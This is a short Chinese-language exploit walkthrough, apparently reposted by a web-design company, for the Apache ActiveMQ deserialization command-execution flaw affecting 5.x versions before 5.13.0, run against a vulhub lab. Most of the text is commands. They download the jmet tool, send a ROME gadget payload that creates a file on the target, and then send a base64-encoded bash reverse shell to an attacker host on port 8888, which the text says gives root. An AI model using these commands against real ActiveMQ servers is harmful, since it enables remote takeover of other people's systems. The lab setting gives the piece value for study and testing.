本篇文章為大家展示了ActiveMQ反序列化任意命令執(zhí)行漏洞的實(shí)例分析,內(nèi)容簡(jiǎn)明扼要并且容易理解,絕對(duì)能使你眼前一亮,通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。
成都創(chuàng)新互聯(lián)公司主營(yíng)平南網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,app開(kāi)發(fā)定制,平南h5小程序開(kāi)發(fā)搭建,平南網(wǎng)站營(yíng)銷推廣歡迎平南等地區(qū)企業(yè)咨詢
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,該漏洞源于程序沒(méi)有限制可在代理中序列化的類。遠(yuǎn)程攻擊者可借助特制的序列化的Java消息服務(wù)(JMS)ObjectMessage對(duì)象利用該漏洞執(zhí)行任意代碼。
環(huán)境搭建:https://vulhub.org/#/docs/
工具下載:
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
kali :192.168.110.208
vulhub漏洞環(huán)境:192.168.110.213
首先進(jìn)入jmet安裝目錄我這里安裝在/opt下
遠(yuǎn)程創(chuàng)建文件:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/wys" -Yp ROME 192.168.110.213 61616
此時(shí)會(huì)給目標(biāo)的ActiveMQ添加一個(gè)名為事件的隊(duì)列,可以我們通過(guò)http://192.168.110.213:8161/admin/browse.jsp?JMSDestination=event看到這個(gè)隊(duì)列中所有消息:
點(diǎn)擊查看相應(yīng)的id號(hào)消息即可觸發(fā)命令執(zhí)行
此時(shí)進(jìn)入容器
docker-compose exec activemq bash
發(fā)現(xiàn)創(chuàng)建的文件
kali彈shell:
將bash -i >& /dev/tcp/192.168.110.208/8888 0>&1 base64編碼得到
YmFzaCAtaSA+JiAvZGV2L3RjcC8xO.......yMDgvODg4OCAwPiYxCg==
payload如下:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8x.......MDgvODg4OCAwPiYxCg==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.110.213 61616
kali監(jiān)聽(tīng),成功,拿到root權(quán)限
上述內(nèi)容就是ActiveMQ反序列化任意命令執(zhí)行漏洞的實(shí)例分析,你們學(xué)到知識(shí)或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。